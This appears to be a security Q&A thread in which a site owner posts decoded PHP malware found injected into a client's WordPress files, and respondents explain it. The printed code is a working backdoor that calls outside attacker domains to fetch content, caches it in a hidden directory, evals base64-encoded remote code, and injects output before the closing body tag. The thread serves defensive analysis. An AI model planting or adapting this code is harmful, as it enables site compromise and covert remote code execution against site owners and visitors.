# Help in understanding a PHP exploit code found on a wordpress application

Tags: php, exploit, wordpress

I've found this code in base 64 on all php files of one of my client's sites (wordpress) and I'm trying to understand what it does.

I'm also trying to figure out if it was an application exploit or a direct FTP access that past this code.

Everything starts with `setup_globals_777()` and `ob_start('mrobh')` setting the callback to the `mrobh($content)` function.

Then there are a call to `gzdecodeit ($decode)` where the hassle starts out.

It seems like it gets the page content and change it. Now I'm trying to detect the specific changes and understand all functions, including the second one `gzdecodeit()`.

Can someone shed some light on it?

**The calls**

```
setup_globals_777();
ob_start('mrobh');
// Here the application code and html output starts out
```

**The callback:**

```
function mrobh ($content)
{
    @Header('Content-Encoding: none');
    $decoded_content = gzdecodeit($content);
    if (preg_match('/\<\/body/si', $decoded_content)) {
        return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '$1',
                            $decoded_content);
    } else {
        return $decoded_content . gml_777();
    }
}
```

**The setup function (understandable)**

```
function setup_globals_777 ()
{
    $rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
    $mz = "/tmp/";
    if (! is_dir($rz)) {
        @mkdir($rz);
        if (is_dir($rz)) {
            $mz = $rz;
        } else {
            $rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
            if (! is_dir($rz)) {
                @mkdir($rz);
                if (is_dir($rz)) {
                    $mz = $rz;
                }
            } else {
                $mz = $rz;
            }
        }
    } else {
        $mz = $rz;
    }
    $bot = 0;
    $ua = $_SERVER['HTTP_USER_AGENT'];
    if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
        $bot = 1;
    if (stristr($ua, "bingbot") || stristr($ua, "google"))
        $bot = 1;
    $msie = 0;
    if (is_msie_777($ua))
        $msie = 1;
    $mac = 0;
    if (is_mac_777($ua))
        $mac = 1;
    if (($msie == 0) && ($mac == 0))
        $bot = 1;
    global $_SERVER;
    $_SERVER['s_p1'] = $mz;
    $_SERVER['s_b1'] = $bot;
    $_SERVER['s_t1'] = 1200;
    $_SERVER['s_d1'] = "http://sweepstakesandcontestsdo.com/";
    $d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" .
     urlencode($_SERVER["PHP_SELF"]) . "&a=" .
     urlencode($_SERVER["HTTP_USER_AGENT"]);
    $_SERVER['s_a1'] = 'http://www.lilypophilypop.com/g_load.php' . $d;
    $_SERVER['s_a2'] = 'http://www.lolypopholypop.com/g_load.php' . $d;
    $_SERVER['s_script'] = "mm.php?d=1";
}
```

**The first function called after the callback execution:**

> Here is where the magic happens. I can't see the calls for the other
>   available functions  and understand what this function is actually
>   decoding, since the `$decode` var is the application output grabbed by
>   the `ob_start()`

```
function gzdecodeit ($decode)
{
    $t = @ord(@substr($decode, 3, 1));
    $start = 10;
    $v = 0;
    if ($t & 4) {
        $str = @unpack('v', substr($decode, 10, 2));
        $str = $str[1];
        $start += 2 + $str;
    }
    if ($t & 8) {
        $start = @strpos($decode, chr(0), $start) + 1;
    }
    if ($t & 16) {
        $start = @strpos($decode, chr(0), $start) + 1;
    }
    if ($t & 2) {
        $start += 2;
    }
    $ret = @gzinflate(@substr($decode, $start));
    if ($ret === FALSE) {
        $ret = $decode;
    }
    return $ret;
}
```

**All the available functions (after a `base64_decode()`):**

```
<?php
if (function_exists('ob_start') && ! isset($_SERVER['mr_no'])) {
    $_SERVER['mr_no'] = 1;
    if (! function_exists('mrobh')) {
        function get_tds_777 ($url)
        {
            $content = "";
            $content = @trycurl_777($url);
            if ($content !== false)
                return $content;
            $content = @tryfile_777($url);
            if ($content !== false)
                return $content;
            $content = @tryfopen_777($url);
            if ($content !== false)
                return $content;
            $content = @tryfsockopen_777($url);
            if ($content !== false)
                return $content;
            $content = @trysocket_777($url);
            if ($content !== false)
                return $content;
            return '';
        }
        function trycurl_777 ($url)
        {
            if (function_exists('curl_init') === false)
                return false;
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            $result = curl_exec($ch);
            curl_close($ch);
            if ($result == "")
                return false;
            return $result;
        }
        function tryfile_777 ($url)
        {
            if (function_exists('file') === false)
                return false;
            $inc = @file($url);
            $buf = @implode('', $inc);
            if ($buf == "")
                return false;
            return $buf;
        }
        function tryfopen_777 ($url)
        {
            if (function_exists('fopen') === false)
                return false;
            $buf = '';
            $f = @fopen($url, 'r');
            if ($f) {
                while (! feof($f)) {
                    $buf .= fread($f, 10000);
                }
                fclose($f);
            } else
                return false;
            if ($buf == "")
                return false;
            return $buf;
        }
        function tryfsockopen_777 ($url)
        {
            if (function_exists('fsockopen') === false)
                return false;
            $p = @parse_url($url);
            $host = $p['host'];
            $uri = $p['path'] . '?' . $p['query'];
            $f = @fsockopen($host, 80, $errno, $errstr, 30);
            if (! $f)
                return false;
            $request = "GET $uri HTTP/1.0\n";
            $request .= "Host: $host\n\n";
            fwrite($f, $request);
            $buf = '';
            while (! feof($f)) {
                $buf .= fread($f, 10000);
            }
            fclose($f);
            if ($buf == "")
                return false;
            list ($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), 
            $buf);
            return $buf;
        }
        function trysocket_777 ($url)
        {
            if (function_exists('socket_create') === false)
                return false;
            $p = @parse_url($url);
            $host = $p['host'];
            $uri = $p['path'] . '?' . $p['query'];
            $ip1 = @gethostbyname($host);
            $ip2 = @long2ip(@ip2long($ip1));
            if ($ip1 != $ip2)
                return false;
            $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
            if (! @socket_connect($sock, $ip1, 80)) {
                @socket_close($sock);
                return false;
            }
            $request = "GET $uri HTTP/1.0\n";
            $request .= "Host: $host\n\n";
            socket_write($sock, $request);
            $buf = '';
            while ($t = socket_read($sock, 10000)) {
                $buf .= $t;
            }
            @socket_close($sock);
            if ($buf == "")
                return false;
            list ($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), 
            $buf);
            return $buf;
        }
        function update_tds_file_777 ($tdsfile)
        {
            $actual1 = $_SERVER['s_a1'];
            $actual2 = $_SERVER['s_a2'];
            $val = get_tds_777($actual1);
            if ($val == "")
                $val = get_tds_777($actual2);
            $f = @fopen($tdsfile, "w");
            if ($f) {
                @fwrite($f, $val);
                @fclose($f);
            }
            if (strstr($val, "|||CODE|||")) {
                list ($val, $code) = explode("|||CODE|||", $val);
                eval(base64_decode($code));
            }
            return $val;
        }
        function get_actual_tds_777 ()
        {
            $defaultdomain = $_SERVER['s_d1'];
            $dir = $_SERVER['s_p1'];
            $tdsfile = $dir . "log1.txt";
            if (@file_exists($tdsfile)) {
                $mtime = @filemtime($tdsfile);
                $ctime = time() - $mtime;
                if ($ctime > $_SERVER['s_t1']) {
                    $content = update_tds_file_777($tdsfile);
                } else {
                    $content = @file_get_contents($tdsfile);
                }
            } else {
                $content = update_tds_file_777($tdsfile);
            }
            $tds = @explode("\n", $content);
            $c = @count($tds) + 0;
            $url = $defaultdomain;
            if ($c > 1) {
                $url = trim($tds[mt_rand(0, $c - 2)]);
            }
            return $url;
        }
        function is_mac_777 ($ua)
        {
            $mac = 0;
            if (stristr($ua, "mac") || stristr($ua, "safari"))
                if ((! stristr($ua, "windows")) && (! stristr($ua, "iphone")))
                    $mac = 1;
            return $mac;
        }
        function is_msie_777 ($ua)
        {
            $msie = 0;
            if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") ||
             stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9"))
                $msie = 1;
            return $msie;
        }
        function setup_globals_777 ()
        {
            $rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
            $mz = "/tmp/";
            if (! is_dir($rz)) {
                @mkdir($rz);
                if (is_dir($rz)) {
                    $mz = $rz;
                } else {
                    $rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
                    if (! is_dir($rz)) {
                        @mkdir($rz);
                        if (is_dir($rz)) {
                            $mz = $rz;
                        }
                    } else {
                        $mz = $rz;
                    }
                }
            } else {
                $mz = $rz;
            }
            $bot = 0;
            $ua = $_SERVER['HTTP_USER_AGENT'];
            if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
                $bot = 1;
            if (stristr($ua, "bingbot") || stristr($ua, "google"))
                $bot = 1;
            $msie = 0;
            if (is_msie_777($ua))
                $msie = 1;
            $mac = 0;
            if (is_mac_777($ua))
                $mac = 1;
            if (($msie == 0) && ($mac == 0))
                $bot = 1;
            global $_SERVER;
            $_SERVER['s_p1'] = $mz;
            $_SERVER['s_b1'] = $bot;
            $_SERVER['s_t1'] = 1200;
            $_SERVER['s_d1'] = "http://sweepstakesandcontestsdo.com/";
            $d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" .
             urlencode($_SERVER["PHP_SELF"]) . "&a=" .
             urlencode($_SERVER["HTTP_USER_AGENT"]);
            $_SERVER['s_a1'] = 'http://www.lilypophilypop.com/g_load.php' . $d;
            $_SERVER['s_a2'] = 'http://www.lolypopholypop.com/g_load.php' . $d;
            $_SERVER['s_script'] = "mm.php?d=1";
        }


        if (! function_exists('gml_777')) {
            function gml_777 ()
            {
                $r_string_777 = '';
                if ($_SERVER['s_b1'] == 0)
                    $r_string_777 = '';
                return $r_string_777;
            }
        }
        if (! function_exists('gzdecodeit')) {
            function gzdecodeit ($decode)
            {
                $t = @ord(@substr($decode, 3, 1));
                $start = 10;
                $v = 0;
                if ($t & 4) {
                    $str = @unpack('v', substr($decode, 10, 2));
                    $str = $str[1];
                    $start += 2 + $str;
                }
                if ($t & 8) {
                    $start = @strpos($decode, chr(0), $start) + 1;
                }
                if ($t & 16) {
                    $start = @strpos($decode, chr(0), $start) + 1;
                }
                if ($t & 2) {
                    $start += 2;
                }
                $ret = @gzinflate(@substr($decode, $start));
                if ($ret === FALSE) {
                    $ret = $decode;
                }
                return $ret;
            }
        }
        function mrobh ($content)
        {
            @Header('Content-Encoding: none');
            $decoded_content = gzdecodeit($content);
            if (preg_match('/\<\/body/si', $decoded_content)) {
                return preg_replace('/(\<\/body[^\>]*\>)/si', 
                gml_777() . "\n" . '$1', $decoded_content);
            } else {
                return $decoded_content . gml_777();
            }
        }

    }
}
```

Comment: What makes you think there is an exploit?  The first function is obvious, it keep strying to do those commands, until its sucessful or fails and returns ''

Comment: @Ramhound This code was found on the application, someone put that through an app exploit or FTP. The first function is simple, but it's just a function. The script doesn't starts there. Have you really locked until the end? It seems like you read the first lines and then commented.

Comment: I saw this was also posted on [SO](http://stackoverflow.com/q/9421414/305019)

Answer (score 1, accepted):

This is clearly and obviously exploit code; I've seen code like this many times on hacked servers. However, there's bits missing so I can't tell exactly what it does. A lot of these functions are defined but never called.

The meat of what it's after, though, is in the function `mrobh()`. This inserts the string returned by the function `gml_777()` right before the closing `body` tag.

The function `gml_777` is a bit unusual. You can see it is set up to return two possible results, one if the User-Agent corresponds to a search engine crawler and one for all other hosts. But oddly enough, it returns an empty string under both cases, which would leave the HTML output untouched. This function could be defined somewhere else as well, though, which might override this behavior.

It looks like the script is designed to retrive additional instructions or content from a remote server, but exactly what it's trying to grab and where it's getting it from is missing from this code. There are bits of it, but not enough to follow the execution path.

Don't get to hung up on the `gzdecode` function. I think it's only there to un-gzip the wordpress output if it was compressed  (which is sometimes the case depending on your plugins and settings).

**Unsolicited advice**: nuke and restore from backup.

Comment: In relation to the [SO answer](http://stackoverflow.com/a/9421615/305019) and looking through the code : the extra code is dynamically loaded from a couple of URLs (defined in `setup_globals_777`) and I would guess it would re-define `gml_777` there. This probably allows the code to 'keep quiet' for a while, and only do something when the attackers want to. As you said, the pasted code is just some kind of a bootstrap.